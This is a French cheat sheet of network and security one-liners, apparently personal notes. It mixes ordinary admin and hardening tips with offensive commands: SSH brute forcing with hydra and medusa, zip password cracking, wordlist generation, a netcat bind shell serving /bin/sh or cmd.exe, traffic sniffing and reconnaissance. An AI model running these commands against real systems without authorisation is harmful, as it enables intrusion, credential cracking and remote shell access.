meta données pour cette page
  •  

Liste de petites astuces

  • Connaître son IP publique :
curl ifconfig.me/ip
  • Tester si un service est up :
nc -vz $IP $PORT
  • Crack password zip :
fcrackzip -u -l 1-6 -c 'a1' 12475.zip
  • Evoyer un disque chiffré à travers un tunnel SSH :
dd if=/dev/disk bs=65536 conv=noerror,sync | ssh -C user@serer "cat >/tmp/disque.dd"
  • Construire une liste de mot de passe :
crunch 4 8 [0-9a-z] -o mdp.txt

netcat (nc) est la version non chiffré de cryptcat (cryptcat)

  • Envoyer des fichiers :
# serveur :
nc -l -p 1000 > fichier.txt
# client :
nc ip_serveur 1000 < fichier.txt
  • Brute force sur l’authentification d'un service
medusa -h 192.168.0.25 -U users.txt -P pass.txt -M ssh -n 122 -f
hydra -L users.txt -P pass.txt -s 122 -t 3 ssh://192.168.0.25
  • Flush IP :
ip -s -s neigh flush all
  • Fournir un schell au client :
# serveur :
nc -l -p 1000 -e /bin/sh
nc.exe -L -p 1000 c:\Windows\System32\cmd.exe
# client :
nc ip_serveur 1000
  • Récupérer la clé secrête d'un transfère de zone :
dig @challenge01.root-me.org ch11.challenge01.root-me.org -p 54011 axfr
  • Scanner rapidement les ports ouverts :
nc -zv 127.0.0.1 1-2048

tai

  • Liste des machines sur le réseau :
netdiscover -i eth0 -r 192.168.1.0/24
  • Capturer les paquets :
tcpflow -i eth0 -C -J port 80 -w capture.pcap
  • Capture de paquets http :
 urlsnarf -i usb0 (+regex)
  • Sécurisé la version d'un serveur dns :
btatu@xmg:~$ nslookup 
> server ns5.evolix.net
Default server: ns5.evolix.net
Address: 212.83.165.242#53
> set class=chaos
> set q=txt
> version.bind
Server:		ns5.evolix.net
Address:	212.83.165.242#53

** server can't find version.bind: REFUSED
  • Dev son propre navigateur :
http://dev.glicer.com/section/probleme-solution/creer-navigateur-personnalise.html
  • Récupérer les ips avec leurs @mac depuis un routeur via snmp
apt-get install snmp
snmpwalk -v1 -c public 192.168.1.254 1 > mibs 
cat mibs  |grep 192.168.1. |grep Hex|grep iso.3.6.1.2.1.3.1 |less

Trouver les mails d'un domaine

Télécharger le logiciel sur www.edge-security.com puis

theharvester -d syngress.com -l 10 -b google

Historique des connexions

lastlog ­-t 10

Le base64

  • encode :
 echo "bonjour" | openssl base64
 echo "bonjour" | base64
 Ym9uam91cgo=
  • Décode :
echo "Ym9uam91cgo=" | openssl base64 -d
echo "Ym9uam91cgo=" | base64 -d
bonjour
  • Vérifier la source (UDP spoofing)
sysctl -w net.ipv4.conf.default.rp_filter = 1
  • Activer les SYN cookies (limite le SYN flooding)
sysctl -w net.ipv4.tcp_syncookies = 1
  • Rejeter les redirections ICMP (limite les MitM)
sysctl -w net.ipv4.conf.all.accept_redirects = 0
sysctl -w net.ipv4.conf.all.secure_redirects = 0
  • Analyser son système :
apt-get install lynis && lynis -c -q

Pour ssh : https://github.com/arthepsy/ssh-audit

commandes en vracs

radiff2
rax2
rasm2
rabin2
radind2